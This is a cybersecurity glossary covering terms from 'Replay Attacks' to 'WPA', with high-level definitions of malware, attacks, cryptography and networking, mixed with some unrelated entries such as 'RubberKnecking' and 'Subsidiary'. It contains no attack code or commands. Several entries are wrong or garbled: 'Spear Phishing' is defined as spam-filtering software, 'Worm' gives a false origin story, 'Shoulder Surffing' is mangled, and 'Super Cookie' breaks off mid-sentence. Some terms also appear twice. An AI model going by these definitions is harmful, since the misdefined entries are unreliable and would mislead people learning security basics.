Replay Attacks - This type of attack uses authentication data that cyber criminals have previously gathered to re-transmit this confidential information. The purpose is to gain unauthorized access or produce other malicious effects.

Reseller Hosting - Reseller hosting is a form of web hosting wherein the account owner has the ability to use his or her allotted hard drive space and bandwidth to host websites on behalf of third parties. The reseller purchases the host's services wholesale and then sells them to customers, possibly for a profit.

Residual Risk - The likelihood and impact of a threat that remains after security controls are implemented.

Residual Risk Assessment - An assessment, which is performed at the end of the system development lifecycle, to determine the remaining likelihood and impact of a threat.

Residual Risk Level - The degree of residual risk (e.g. high, medium, low).

Resilience - This is an organization’s or system’s ability to restore its ability to function and achieve its objectives during and after a cyber attack or other transformations. Resilience includes ensuring contingency plans, doing constant risk management and planning for every crisis scenario.

Reverse Engineering - This is a technique heavily used by cyber security researchers who constantly take malware apart to analyze it. This way, they can understand and observe how the malware works and can devise security solutions that can protect users against that type of malware and its tactics. This is one of the most valuable activities in cyber security intelligence gathering.

Risk Assessment - This is a risk analysis process that defines an organization’s cyber security risks and their potential impact. Security measures are then suited to match the importance and potential impact of the risks identified as a result of the risk assessment.

Risk Level - The degree of risk (e.g. high, medium, low).

Risk Management - This is the process by which an organization manages its cyber security risks to decrease their potential impact and take the adequate measures to avoid cyber attacks. Doing a risk assessment is also part of the process, as well as the risk mitigation strategy and all the procedures that must be applied in order to ensure proper defenses against cyber threats. This is a continuous process and should be viewed as a cycle.

Risk Mitigation - This is the process by which risks are evaluated, prioritized and managed through mitigation tactics and measures. Since any company has a dynamic environment, a periodical revision should be a defining characteristic of the risk mitigation process.

Rogue Security Software - Rogue security software is a common Internet scam used by cyber criminals to mislead victims and infect their PCs with malware. Malicious actors could also use fake antivirus to trick victims into paying money or extort them (like ransomware does) into paying for having the rogue software removed. So please only buy security software from trusted vendors or from the software makers themselves.

Rogueware - Type of deceitful malware which claims to be a trusted and harmless software program (such as antivirus). Cyber criminals use rogueware to harvest data from their victims or to trick them intro paying money. Often, rogueware also includes adware functions, which adds a burden and a potential risk to the infected PC.

Root Cause Analysis - This is the process used to identify the root causes for certain security risks in an organization. This must be done with the utmost attention to detail and by maintaining an objective perspective.

Rootkit - Type of malicious software (but not always) which gives the attackers privileged access to a computer and is activated before the operating system boots up. Rookits are created to conceal the existence of other programs or processes from being spotted by traditional detection methods. For example, rookit malware is capable of covering up the fact that a PC has been compromised. By gaining administrator rights on the affected PC (through exploits or social engineering), attackers can maintain the infection for a long time and are notoriously difficult to remove.

Routing Protocol - A generic term that refers to a formula, or protocol, used by a router to determine the appropriate path over which data is transmitted. The routing protocol also specifies how routers in a network share information with each other and report changes. The routing protocol enables a network to make dynamic adjustments to its conditions, so routing decisions do not have to be predetermined and static.

RSA - Rivest–Shamir–Adleman is an example of an asymmetric encryption protocol that uses a public andprivate key. Used by modern computers to encrypt and decrypt messages. It is an asymmetric cryptographic algorithm. Asymmetric means that there are two different keys. This is also called public key cryptography, because one of the keys can be given to anyone.

RubberKnecking - Refers to the physical act of craning one's neck, performed in order to get a better view, eavesdrop, and fulfill our morbid curiosity. RubberKnecking occurs when something catches your eye. Being nosey. Someone you feel is attractive walks or drives by. When people Ducklip for a picture they RubberKneck trying to capture the perfect selfie.

Rule Based Anti-Phishing - Rule-based approaches to phishing attacks create a series of rules based on a variety of factors to detect phish. When new threats come in, more rules are created. Critics of the rule-based approach argue that over time, rules become complex and difficult to manage, and challenging to keep up-to-date.

top page


Safeguards - This refers to a set of protection measures that have to meet an information system’s core security requirements, in order to ensure confidentiality, integrity, and availability. This includes everything from employee security to ensuring the safety of physical structures and devices, to management limitations and more.

Sandboxing - Sandboxing is a security feature that can be used in antimalware to isolate potentially malicious files from the rest of the system. Sandboxing is often used as a method to filter out potentially malicious files and remove them before they have had a chance to do damage.

Sanitize - Sanitization is a process through which data is irreversibly removed from media. The storage media is left in a re-usable condition in accordance with IT security policy, but the data that was previously on it cannot be recovered or accessed.

Scareware - This is a type of malware (or rogueware) that employs social engineering to intimidate and confuse the victims through shock, anxiety, fear and time reistrictions. The objective is to maliciously persuade the victims into buying unwanted software. The software could be rogue security software, ransomware or other type of malware. For example, malicious actors often try to manipulate users that their computer is infected with a virus and that the only way to get rid of it is to pay for, download and install a fake antivirus, which, of course, turns out to be the malware itself.

Scavenging - This is the action of trying to find confidential or sensitive data by searching through a system’s data residue.

Secondary DNS - A secondary server holds a secondary DNS zone—a read-only copy of the zone file, which contains the DNS records. It receives an updated version of the copy in an operation called zone transfer. Secondary servers can pass a change request if they wish to update their local copy of the DNS records. Secondary DNS servers are not mandatory—the DNS system can work even if only a primary server is available. But it is standard, and often required by domain registrars, to have at least one secondary server.

Security Controls - This is a set of safeguards designed to avoid and mitigate the impact of cyber security risks that an organization has.

Security Destruction - The destruction of information assets through one or more approved methods, carried out alone or in combination with erasing, to ensure that information cannot be retrieved.

Secure Cookie - Can only be transmitted over an encrypted connection (i.e. HTTPS). They cannot be transmitted over unencrypted connections (i.e. HTTP). This makes the cookie less likely to be exposed to cookie theft via eavesdropping. A cookie is made secure by adding the Secure flag to the cookie.

Secure Erasure - A digital sanitization process that uses tools and industry-standard commands (e.g. ATA security erase) to erase all accessible memory locations of a data storage device.

Secure Sockets Layer - Secure Sockets Layer (SSL) is a standard security technology for establishing an encrypted link between a server and a client—typically a web server (website) and a browser, or a mail server and a mail client (e.g., Outlook).

Security Impact analysis - An organization should always conduct a security impact analysis to determine if certain changes to the information systems have influenced and impacted its security state.

Security Tokens - Use of smart cards or other security tokens may improve security against replay attacks in the face of a successful keylogging attack, as accessing protected information would require both the (hardware) security token as well as the appropriate password/passphrase. Knowing the keystrokes, mouse actions, display, clipboard etc. used on one computer will not subsequently help an attacker gain access to the protected resource. Some security tokens work as a type of hardware-assisted one-time password system, and others implement a cryptographic challenge-response authentication, which can improve security in a manner conceptually similar to one time passwords.

Security Requirements - Security requirements are derived from multiple sources and make up for the security necessities of an information system, in order to ensure confidentiality, integrity, and availability of the information that’s managed, transmitted or stored in the system. The sources for security requirements can be legislation, directives, policies, standards, best practices, regulations, procedures or other business necessities.

Sensitive Information - This type of information is defined by the fact that not everyone can access it. Sensitive information is data that is confidential for a certain category of users, who can view, access and use this data. This type of information is protected for reasons either related to legal aspects or ethical ones. Examples include: personal identification numbers, health information, education records, trade secrets, credit card information, etc.

Sensor - Sensors can be placed in different locations around a network with the intention ofcollecting information and returning it to a central location for analysis and viewing.

SEO Poisoning - Malicious websites use search engine optimization tactics to make them show up prominently in search results. The sites are associated with terms that large numbers of people are likely to be using in searches at any given time, such as phrases related to holidays, news items and viral videos.

Separation of Duties - A security principle stating that sensitive or critical responsibilities should be shared by multiple entities (e.g. staff or processes), rather than a single entity, to prevent a security breach.

SERP - Seach Engine Results Page(s) are web pages served to users when they search for something online using a search engine. The user enters their search query upon which the search engine presents them with a SERP.

Session Cookie - Web browsers normally delete session cookies when the user closes the browser. Unlike other cookies, session cookies do not have an expiration date assigned to them, which is how the browser knows to treat them as session cookies.

Server - In computing, a server is a computer program or a device that provides functionality for other programs or devices, called "clients". This architecture is called the client–server model, and a single overall computation is distributed across multiple processes or devices.

Service Level Agreement - Commitment between a service provider and a client. Particular aspects of the service – quality, availability, responsibilities – are agreed between the service provider and the service user. The most common component of an SLA is that the services should be provided to the customer as agreed upon in the contract.

Service Set Indentifier - The service set identifier (SSID) defines a service set or extended service set. Normally it is broadcast in the clear by stations in beacon packets to announce the presence of a network and seen by users as a wireless network name.

SHA - Secure Hash Algorithm is an example of one type of hashing algorithm that is commonly used today. The 160-bit SHA was developed by the National Institute of Standards & Technology (NIST) in 1993, and SHA-1 was the first revision in 1994.

Shared Web Hosting - Shared web hosting service refers to a web hosting service where many websites reside on one web server connected to the Internet. This is generally the most economical option for hosting, as the overall cost of server maintenance is amortized over many customers.

Shoulder Surffing - Covertly peering over another peering shoulder.

Shylock - Shylock is a banking malware created to steal users’ banking credentials for fraudulent purposes. Shylock is based on the leaked ZeuS code and acts similar to Zeus GameOver (created based on the same malicious code), because it uses a (DGA) Domain generation algorithm to hide its traffic and remain undetected by traditional antivirus and anti-malware solutions. Shylock is delivered mainly through drive-by downloads on compromised websites which are hit by malvertising, but also through malicious JavaScript injects.

SIEM Security Information and Event Management - In the field of computer security, security information and event management, software products and services combine security information management and security event management. They provide real-time analysis of security alerts generated by applications and network hardware. SIEM software collects and aggregates log data generated throughout the organization’s technology infrastructure, from host systems and applications to network and security devices such as firewalls and antivirus filters.

Signature - In cyber security, a signature is an identifiable, differentiating pattern associated with a type of malware, an attack or a set of keystrokes which were used to gain unauthorized access to a system. For example, traditional antivirus solutions can spot, block and remove malware based on their signature, when the AV sees that a piece of software on your PC matched the signature of a malicious software stored in their database.

Single Sign-On - Authentication method that allows users to sign in using one set of credentials to multiple independent software systems. Using SSO means a user doesn't have to sign in to every application they use.

Skimming - Skimming happens when a malicious actor uses a tag reader in an unauthorized manner, in order to collect information about a person’s tag. The victim never knows or accepts to be skimmed. For example, card skimming is an illegal practice which consists of the illegal collection of data from a card’s magnetic stripe. This information can then be copied onto a blank card’s magnetic stripe and used by malicious actors to make purchases and withdraw cash in the name of the victim.

Slack Attacks - A cloud-based team collaboration service similar to instant messaging, Slack users can become victims of a phishing attack when a hacker sends malicious links or attachments through direct message or a Slackbot reminder. Because most people associate phishing with email only, Slack attacks catch them off-guard and are often successful.

Smart Card - A smart card, chip card, or integrated circuit card (ICC) is a physical electronic authorization device, used to control access to a resource. It is typically a plastic credit card sized card with an embedded integrated circuit. Many smart cards include a pattern of metal contacts to electrically connect to the internal chip. Others are contactless, and some are both. Smart cards can provide personal identification, authentication, data storage, and application processing

Smurf Attack - A basic smurf attack occurs when the attacker floods the target network with infinite ICMP request packets. Packets include a source address set to the network’s broadcast address, which prompts every device on the network that receives the request to issue a response. This causes a massive amount of traffic, which will eventually take the system down.

Sniffer - A sniffer is a tool used to monitor traffic over a network. It can be used legitimately, to detect issues with the data flow. But it can also be used by malicious actors, to harvest data that’s transmitted over a network.

Sniffing Protocol - Also referred to as a bus-snooping protocol, a protocol for maintaining cache coherency in symmetric multiprocessing environments. In a snooping system, all caches on the bus monitor (or snoop) the bus to determine if they have a copy of the block of data that is requested on the bus. Every cache has a copy of the sharing status of every block of physical memory it has. Multiple copies of a document in a multiprocessing environment typically can be read without any coherence problems; however, a processor must have exclusive access to the bus in order to write.

SoC - Stands for "System On a Chip." An SoC (pronounced "S-O-C") is an integrated circuit that contains all the required circuitry and components of an electronic system on a single chip. It can be contrasted with a traditional computer system, which is comprised of many distinct components. A desktop computer, for example, may have a CPU, video card, and sound card that are connected by different buses on the motherboard. An SoC combines these components into a single chip.

Social Engineering - In information security, social engineering if a form of psychological manipulation used to persuade people to perform certain actions or give away sensitive information. Manipulation tactics include lies, psychological tricks, bribes, extortion, impersonation and other type of threats. Social engineering is often used to extract data and gain unauthorized access to information systems, either of a single, private users or which belong to organizations.

Spam - Spam is made up of unsolicited emails or other types of messages sent over the Internet. Spam is often used to spread malware and phishing, which is why you should never open, reply to or download attachments from spam messages. Spam cam come your way in the form of emails, instant messages, comments, etc.

Spear Phishing - This is a type of program which can analyze emails and other types of messages (i.e. instant messages) to weed out spam. If spam filtering software decides to categorize a message as spam, it’ll probably move that message to a dedicated folder.

Specialized Dictionary - Concentrating on a small area of a subject.

Speech Recognition - Similar to on-screen keyboards, speech-to-text conversion software can also be used against keyloggers, since there are no typing or mouse movements involved. The weakest point of using voice-recognition software may be how the software sends the recognized text to target software after the recognition took place.

Spillage - Information spillage happen when data is moved from a safe, protected system to another system, which is less secure. This can happen to all types of data, from health information to financial or personal data. If the system the data is moved to is less secure, people who should not have access to this information may be able to access it.

Socially Acceptable - Accepted within a social culture or subculture.

Social Engineering - Social engineering, in the context of information security, is the psychological manipulation of people into performing actions or divulging confidential information.

Social Science - Scientific study of human society and social relationships.

Sponsoring Department - Department which is facing the posted challenge and will fund the development of the proof of concept and prototype.

Spoofing - This is a compromise attempt during which an unauthorized individual tries to gain access to an information system by impersonating an authorized user. For example, email spoofing is when cyber attackers send phishing emails using a forged sender address. You might believe that you’re receiving an email from a trusted entity, which causes you to click on the links in the email, but the link may end up infecting your PC with malware.

Spy-phishing - This is a type of malware that employs tactics found in both phishing and spyware. By combining these cyber threats, spy-phishing is capable of downloading applications that can run silently on the victim’s system. When the victims open a specific URL, the malware will collect the data the victim puts into that website and send it to a malicious location (like a web server). This technique is used to extend the duration of the phishing attack, even after the phishing website has been taken down.

Spyware - Spyware is a type of malware designed to collect and steal the victim’s sensitive information, without the victim’s knowledge. Trojans, adware and system monitors and are different types of spyware. Spyware monitors and stores the victim’s Internet activity (keystrokes, browser history, etc.) and can also harvest usernames, passwords, financial information and more. It can also send this confidential data to servers operated by cyber criminals, so it can be used in consequent cyber attacks.

Stack - A protocol stack refers to a group of protocols that are runnning concurrently that are employed for the implementation of network protocol suite. The protocols in a stack determine the interconnectivity rules for a layered network model such as in the OSI or TCP/IP models.

SQL Injection - This is a tactic that used code injection to attack applications which are data-driven. The maliciously injected SQL code can perform several actions, including dumping all the data in a database in a location controlled by the attacker. Through this attack, malicious hackers can spoof identities, modify data or tamper with it, disclose confidential data, delete and destroy the data or make it unavailable. They can also take control of the database completely.

SSH - Secure Shell remote login. SSH is a modern protocol designed to be more secure and safer than protocols suchas FTP and Telnet. As such, the SSH protocol is replacing FTP and Telnet in manyenvironments.

SSL Secure Socket Layer - SSL comes from Secure Sockets Layer, which is an encryption method to ensure the safety of the data sent and received from a user to a specific website and back. Encrypting this data transfer ensures that no one can snoop on the transmission and gain access to confidential information, such as card details in the case of online shopping. Legitimate websites use SSL (start with https) and users should avoid inputting their data in websites that don’t use SSL.

Static Routing - Static routing is a form of routing that occurs when a router uses a manually-configured routing entry, rather than information from dynamic routing traffic. In many cases, static routes are manually configured by a network administrator by adding in entries into a routing table, though this may not always be the case.

Stealware - This is a type of malware which is capable of transferring data or money to a third, malicious party. This type of malware usually targets affiliate transactions. It then uses an HTTP cookie to redirect the commission earned by an affiliate marketer to an unauthorized third party.

Steganography - The purpose of steganography is to conceal and deceive. It is a form of covert communication and can involve the use of any medium to hide messages. It’s not a form of cryptography, because it doesn’t involve scrambling data or using a key. Instead, it is a form of data hiding and can be executed in clever ways. Where cryptography is a science that largely enables privacy, steganography is a practice that enables secrecy – and deceit.

Strong Authentication - This is a specific requirement that calls for employing multiple authentication factors from different categories and sophisticated technology to verify an entity’s identity. Dynamic passwords, digital certificates, protocols and other authentication elements are part of strong authentication standards. This is especially applied in banking and financial services, where access to an account has to be tied to a real person or an organization.

Subsidiary - Is understood to be a business which has more than 50% of its ordinary shares or voting power owned by another business or individual.

System recovery - Characterizes the speed at which a DUT recovers from an overload condition. To test system recovery, send a stream of frames at a rate higher than the recorded throughput and measure delay, then reduce that rate and measure the delay again. The system recovery time is the difference in these two delay times.

System reset - Measures the speed at which a DUT recovers from a hardware or software reset or a power interruption. A System Reset test is performed by sending a continuous stream of frames during a reset process and monitoring the output until frames begin to be forwarded. The System reset measurement is the time between when the last frame of the initial stream and the first frame of the new stream are received.

Super Cookie - A super cookie is a cookie with an origin of a top-level domain (such as .com) or a public suffix (such as Ordinary cookies, by contrast, have an origin of a specific domain name, such as

Note: If an attacker takes control of a website, they can set a super cookie to disrupt or impersonate legitimate user requests to another website that shares the same top-level domain or public suffix as their malicious website.

Supply Chain Attack - This type of attack aims to inflict damage upon an organization by leveraging vulnerabilities in its supply network. Cyber criminals often manipulate with hardware or software during the manufacturing stage to implant rootkits or tie in hardware-based spying elements. Attackers can later use these implants to attack the organization they’re after.

Suppression Measure - This can be any action or device used to reduce the security risks in an information system. This is part of the risk mitigation process, aimed at minimizing the security risks of an organization or information system.

Suspicious Files and Behavior - Suspicious behavior is identified when files exhibit an unusual behavior pattern. For example, if files start copying themselves to a system folder, this might be a sign that those file have been compromised by malware. Traditional antivirus solutions incorporate this type of detection to spot and block malware.

Switch - A switch is used to network multiple computers together. Switches made for the consumer market are typically small, flat boxes with 4 to 8 Ethernet ports. These ports can connect to computers, cable or DSL modems, and other switches. High-end switches can have more than 50 ports and often are rack mounted.

Symmetric Key - A cryptographic key used to perform the cryptographic operation and its inverse operation (e.g. encrypt and decrypt, create a message authentication code and verify the code).

SYN Flood - A SYN flood is a form of denial-of-service attack in which an attacker sends a succession of SYN requests to a target's system in an attempt to consume enough server resources to make the system unresponsive to legitimate traffic.

System Administrator / SysAdmin - The sysadmin, how it’s also called, is a person in charge of all the technical aspects of an information system. This includes aspects related to configuration, maintenance, ensuring reliability and the necessary resources for the system to run at optimal parameters while respecting a budget and more.

System Integrity - This state defines an information system which is able to perform its dedicated functions at optimal parameters, without intrusion or manipulation (either intended or not).

top page


Tampering - The intentional activity of modifying the way an information system works, in order to force it to execute unauthorized actions.

Targeted Threat - Targeted threats are singled out because of their focus: they are usually directed at a specific organization or industry. These threats are also designed to extract sensitive information from the target, so cyber criminals take a long time to prepare these threats. They are carefully documented, so the chances for successful compromise can be as big as possible. Targeted threats are delivered via email (phishing, vishing, etc.), they employ Zero Days and other vulnerabilities to penetrate an information system, and many more. Government and financial organizations are the most frequent targets for this type of cyber threats.

Tarpitting - A tarpit is a service on a computer system that purposely delays incoming connections. The technique was developed as a defense against a computer worm, and the idea is that network abuses such as spamming or broad scanning are less effective, and therefore less attractive, if they take too long.

Technology - Practical application of science to commerce or industry. The science of applying scientific knowledge to practical problems. An innovation based in scientific and industrial progress. Specific information and know-how required for development, production or use of good or service.

Technology Readiness Levels - Technology readiness levels (TRLs) are a method for estimating the maturity of technologies during the acquisition phase of a program, developed at NASA during the 1970s. The use of TRLs enables consistent, uniform discussions of technical maturity across different types of technology.

Tempest - The name for specifications and standards for limiting the strength of electromagnetic emanations from electrical and electronic equipment which lead to reduced vulnerability to eavesdropping. This term originated in the U.S. Department of Defense.

Telemetry Data - Technologies that accommodate collecting information in the form of measurements or statistical data, and forward it to IT systems in a remote location. This term can be used in reference to many different types of systems, such as wireless systems using radio, ultrasonic or infrared technologies, or some types of systems operating over telephone or computer networks. Others may use different strategies like SMS messaging.

TeslaCrypt - TeslaCrypt is a ransomware Trojan, which was first designed to target computers that has specific computer games installed. However, in the past months, this strain of cryptoware had broadened its reach to affect all users (mainly Windows users), not just gamers. As with every other ransomware, TeslaCrypt creators use spam to distribute the infection and, once they get into the victim’s PC, all the data on the device will be encrypted and held hostage. The ransom can vary between $150 and $1000 worth of bitcoins which the victim has to pay in order to get the decryption key. In March 2016, TeslaCrypt 4.0 emerged, featuring unbreakable encryption and rendering any available TeslaCrypt decoders useless.

Threat Event - An actual incident in which a threat agent exploits a vulnerability of an IT asset of value.

Threat and Risk Assessment - A process of identifying system assets and how these assets can be compromised, assessing the level of risk that threats pose to assets, and recommending security measures to mitigate threats.

Threat Source - This refers to the objective and method used by cyber attackers to exploit a security vulnerability or a certain context in order to compromise an information system. Triggering a system vulnerability may happen accidentally or on purpose.

Threat Shifting - This is the process of adapting protection measures in response to cyber attackers’ ever-changing tactics. Countermeasures must be constantly updated to meet the challenges posed by polymorphic malware.

Threat Scenario - A threat scenario draws information from all available resources and focuses on three key elements: Vulnerabilities, Threats and Impact. This helps associate a specific cyber threats to one or more threat sources, and establish priorities.

Threat Modeling - Threat modeling is a process by which potential threats, such as structural vulnerabilities or the absence of appropriate safeguards, can be identified, enumerated, and mitigations can be prioritized.

Threat Monitoring - During this process, security audits and other information in this category are gathered, analyzed and reviewed to see if certain events in the information system could endanger the system’s security. This is a continuous process.

Three-factor Authentication 3FA - The use of identity-confirming credentials from three separate categories of authentication factors – typically, the knowledge, possession and inherence categories.

Throughput - Throughput refers to how much data can be transferred from one location to another in a certain period of time. The throughput test measures the maximum rate at which the count of test frames transmitted by the DUT equals the number of frames sent to it by the test equipment. Or in other words, it determines the rate at which data can travel with zero dropped packets by the device under test. This measurement roughly translates into the available bandwidth.

Time Bomb - This is a type of malware that stays dormant on the system for a definite amount of time, until a specific event triggers it. This type of behavior is present in malware to make detection by security software more difficult.

Time-dependent password - This type of password can be either valid for a limited amount of time or it can be valid for use during a specific interval in a day. Time-dependent passwords are most often generated by an application and are part of the two-factor or multi-factor authentication mechanisms.

Transport Layer Security - Cryptographic protocol designed to provide communications security over a computer network. The protocol is widely used in applications such as email, instant messaging, and voice over IP, but its use as the Security layer in HTTPS remains the most publicly visible. The TLS protocol aims primarily to provide privacy and data integrity between two or more communicating computer applications. It runs in the application layer of the Internet and is itself composed of two layers: the TLS record and the TLS handshake protocols.

Token - In security, a token is a physical electronic device used to validate a user’s identity. Tokens are usually part of the two-factor or multi-factor authentication mechanisms. Tokens can also replace passwords in some cases and can be found under the form of a key fob, a USB, an ID card or a smart card.

Tracking Cookie - This type of cookies are places on users’ computers during web browsing sessions. Their purpose is to collect data about the user’s browsing preferences on a specific website, so they can then deliver targeted advertising or to improve the user’s experience on that website by delivering customized information.

Traffic Analysis - During this process, the traffic on a network is intercepted, examined and reviews in order to determine traffic patterns, volumes and extract relevant statistics about it. This data is necessary to improve the network’s performance, security and general management.

Traffic Encryption Key (TEK) - This is a term specific to network security, which depicts the key used to encrypt the traffic within a network.

Transmission Control Protocol/Internet Protocol TCP/IP - TCP/IP is the suite of communications protocols used to connect hosts on the Internet. TCP/IP uses several protocols, the two main ones being TCP and IP. TCP/IP is built into the UNIX operating system and is used by the Internet, making it the de facto standard for transmitting data over networks. Even network operating systems that have their own protocols, such as Netware, also support TCP/IP.

Transport Layer Security - Transport Layer Security, and its now-deprecated predecessor, Secure Sockets Layer, are cryptographic protocols designed to provide communications security over a computer network. Several versions of the protocols find widespread use in applications such as web browsing, email, instant messaging, and voice over IP.

Trojan - A Trojan Horse is a type of malware that acts according to the Greek legend: it camouflages itself as a legitimate file or program to trick unsuspecting users into installing it on their PCs. Upon doing this, users will unknowingly give unauthorized, remote access to the cyber attackers who created and run the Trojan. Trojans can be used to spy on a user’s activity (web browsing, computer activity, etc.), to collect and harvest sensitive data, to delete files, to download more malware onto the PC and more.

Tunneling - Is a communications protocol that allows for the movement of data from one network to another. It involves allowing private network communications to be sent across a public network through a process called encapsulation.

Two-factor Authentication - A type of multi-factor authentication used to confirm the identity of a user. Authentication is validated by using a combination of two different factors including: something you know (e.g. a password), something you have (e.g. a physical token), or something you are (a biometric).

Two-step Verification - A process requiring two different authentication methods, which are applied one after the other, to access a specific device or system. Unlike two-factor authentication, two-step verification can be of the same type (e.g. two passwords, two physical keys, or two biometrics). Also known as Two-step authentication.

Typhoid adware - This is a cyber security threat that employs a Man-in-the-middle attack in order to inject advertising into certain web pages a user visits while using a public network, like a public, non-encrypted WiFi hotspot. In this case, the computer being used doesn’t need to have adware on it, so installing a traditional antivirus can’t counteract the threat. While the ads themselves can be non-malicious, they can expose users to other threats. For example, the ads could promote a fake antivirus that is actually malware or a phishing attack.

Typosquatting - A sting site, or a fake URL, is a form of cybersquatting, and possibly brandjacking which relies on mistakes such as typos made by Internet users when inputting a website address into a web browser.

top page


Unauthorized Access - When someone gains unauthorized access it means that they’ve illegally or illegitimately accessed protected or sensitive information without permission.

Unpatched Application - A supported application that does not have the latest security updates and/or patches installed.

Unauthorized Disclosure - This happens when sensitive, private information is communicated or exposed to parties who are not authorized to access the data.

Unicode - Unicode is an international encoding standard for use with different languages and scripts in which each letter, digit, or symbol is assigned a unique numeric value that applies across different platforms and programs. Hackers change unicode on their fraudulent sites and make it almost impossible to identify without carefully inspecting the site's URL or SSL certificate.

Unlimited [ Service Name Here ] - There is no such thing as unlimited services, disk space amount or monthly bandwidth. The statement is a sales gimick. The hard disk hosting your content might be 10 terabytes at most. The provider says unlimited knowing you will never use that amount of data unless you're a corporation.

Uptime - Uptime is a measure of system reliability, expressed as the percentage of time a machine, typically a computer, has been working and available. Uptime is the opposite of downtime.

URL Hijacking - Refers to taking advantage of common typos users make when entering a Web address (URL) into their browser. A domain name that is a misspelled version of a popular domain name is legally registered.

URL Injection - A URL (or link) injection is when a cyber criminal created new pages on a website owned by someones else, that contain spammy words or links. Sometimes, these pages also contain malicious code that redirects your users to other web pages or makes the website's web server contribute to a DDoS attack. URL injection usually happens because of vulnerabilities in server directories or software used to operate the website, such as an outdated Wordpress or plugins.

top page


Virtual Private Network - A virtual private network extends a private network across a public network, and enables users to send and receive data across shared or public networks as if their computing devices were directly connected to the private network.

Virtual Private Server - A virtual private server is a virtual machine sold as a service by an Internet hosting service. The virtual dedicated server has also a similar meaning.

Virus - A computer program that can spread by making copies of itself. Computer viruses spread from one computer to another, usually without the knowledge of the user. Viruses can have harmful effects, ranging from displaying irritating messages to stealing data or giving other users control over the infected computer.

Virus Hoax - A computer virus hoax is a message that warns about a non-existent computer virus threat. This is usually transmitted via email, and tells the recipients to forward it to everyone they know. Computer hoaxes are usually harmless, but their intent is not innocent, since they exploit lack of knowledge, concern or ability to investigate before taking the action described in the hoax.

Vishing - Vishing (short for Voice over IP phishing) is a form of phishing performed over the telephone or voice over IP (VoIP) technology, such as Skype. Unsuspecting victims are duped into revealing sensitive or personal information via telephone calls, VoIP calls or even voice mail.

Voice Sniffing - Slanguage: Voice sniffing is when a voice assistant listens to conversations for words that indicate an interest in some type of activity, which can be used for advertising purposes. It is similar to "eavesdropping" but applies to voice assistants, such as Alexa, Google, and Siri.

Vulnerability - A flaw or weakness in the design or implementation of an information system or its environment that could be exploited to adversely affect an organization's assets or operations.

Vulnerability Assessment - A process to determine existing weaknesses or gaps in an information system's protection efforts.

top page


Wabbits - A wabbit is one of four main classes of malware, among viruses, worms and Trojan horses. It's a form of computer program that repeatedly replicates on the local system. Wabbits can be programmed to have malicious side effects. A fork bomb is an example of a wabbit: it's a form of DoS attack against a computer that uses the fork function. A fork bomb quickly creats a large number of procceses, eventually crashing the system. Wabbits don't attempt to spread to other computers across network.

WannaCry - WannaCry ransomware cryptoworm, which targeted computers running the Microsoft Windows operating system by encrypting data and demanding ransom payments in the Bitcoin cryptocurrency.

War Driving - Act of searching for Wi-Fi wireless networks by a person usually in a moving vehicle, using a laptop or smartphone. Software for wardriving is freely available on the internet. Warbiking, warcycling, warwalking and similar use the same approach but with other modes of transportation.

Watering Hole - Watering Hole is the name of a computer attack strategy that was detected as early as 2009 and 2010. The victim is a particular, very targeted group, such as a company, organization, agency, industry, etc. The attacker spends time to gain strategic information about the target: observes which legitimate websites are more often visited by the members of the group. Then the attacker exploits a vulnerability and infects one of those trusted websites with malware, without the knowledge of the site's owner. Eventually, someone from that organization will fall into the trap and get their computer infected. This way, the attacker gains access to the target's entire network. These attacks work because of the constant vulnerabilities in website technologies, even with the most popular systems, such as WordPress, making it easier than ever to stealthily compromise websites.

Web Bug - A web bug, also called a web beacon or pixel tag, is a small, transparent GIF image, usually not bigger than 1 pixel. It's embedded in an email or webpage and is usually used in connection with cookies. Web bugs are designed to monitor your activity and they load when you open an email or visit a website. Most common uses are marketing-related: for email tracking (to see if readers are opening the emails they receive, when they open them), web analytics (to see how many people visited a website), advertisement statistics (to find out how often an ad appears or is being viewed), IP addresses gathering, type of browser used.

Web Content Filtering - A web content filtering software is a program that will screen an incoming web page and restrict or control its content. It is used by governments that can apply them for censorship, by ISPs to block copyright infringement, by employers to sometimes block personal email clients or social media networks, by a school, by parents, etc. This software can block pages that include copyright infringement material, pornographic content, social networks, etc.

Webattacker - Webattacker is a do-it-yourself malware creation kit that demands minimal technical knowledge to be manipulated and used. It includes scripts that simplify the task of infecting computers and spam-sending techniques.

Web Injection - This type of attack allows an attacker to inject code into a program or query or inject malware onto a computer in order to execute remote commands that can read or modify a database, or change data on a web site.

Web Shells - A web-shell is a malicious script used by an attacker with the intent to escalate and maintain persistent access on an already compromised web application. A web-shell itself cannot attack or exploit a remote vulnerability, so it is always the second step of an attack, and is referred to as post-exploitation.

Web Skimming - Web skimming is a form of internet or carding fraud whereby a payment page on a website is compromised when malware is injected onto the page via compromising a third-party script service in order to steal payment information.

Whaling - Whaling is a form of sophisticated phishing whose objective is to collect sensitive data about a target. What’s different from phishing is that whaling goes after high-profile, famous and wealthy targets, such as celebrities, CEO’s, top-level management and other powerful or rich individuals. By using the phished information, fraudsters and cyber criminals can trick victims into revealing even more confidential or personal data or they can be extorted and suffer from financial fraud.

White Box Testing - White-box testing is done with full knowledge of the target environment. White-box testing is a method of software testing that tests internal structures or workings of an application, as opposed to its functionality black-box testing.

White Hat Hacker - Also known as ethical hackers, these are usually cybersecurity specialists, researchers or just skilled techies who find security vulnerabilities for companies and then notify them to issue a fix. Unlike blackhat hackers, they do not use the vulnerabilities except for demonstration purposes. Companies often hire whitehat hackers to test their security systems (known as “penetration testing”). As their expertise has grown to be more in demand and sought after, whitehat hackers started to collect rewards for their work, ranging from 500$ all the way to 100,000$.

White Hat SEO - white hat SEO refers to any practice that improves your search rankings on a search engine results page - SERP - while maintaining the integrity of your website and staying within the search engines' terms of service.

Whitelist - A whitelist is a list of email addresses or IP addresses that are considered to be spam-free. It's the opposite of a blacklist, which usually includes a list of blocked users. Spam filters have both whitelists and blacklists of senders, and also keywords to look for in emails, which enable them to help detect a spam email.

Windows Server - Windows Server is a brand name for a group of server operating systems released by Microsoft. It includes all Windows operating systems that are branded "Windows Server", but not any other Microsoft product. The first Windows server edition to be released under that brand was Windows Server 2003.

Wireless Fidelity - Local area network that uses high frequency radio signals to transmit and receive data over distances of a few hundred feet; uses ethernet protocol. WiFi, wireless local area network, WLAN.

Worm - Internet worms were created by researchers in the 1980s to find a reliable way of growing the Internet through self-replicating programs that can distribute themselves automatically through the network. An Internet worm does exactly that: it distributes itself across the web by using the computers’ Internet connection to reproduce.

WPA - Wi-Fi Protected Access is a data encryption specification for a wireless LAN. It improves upon the security feature of WEP by using Extensible Authentication Protocol (EAP) to secure network access and an encryption method to secure data transmissions.

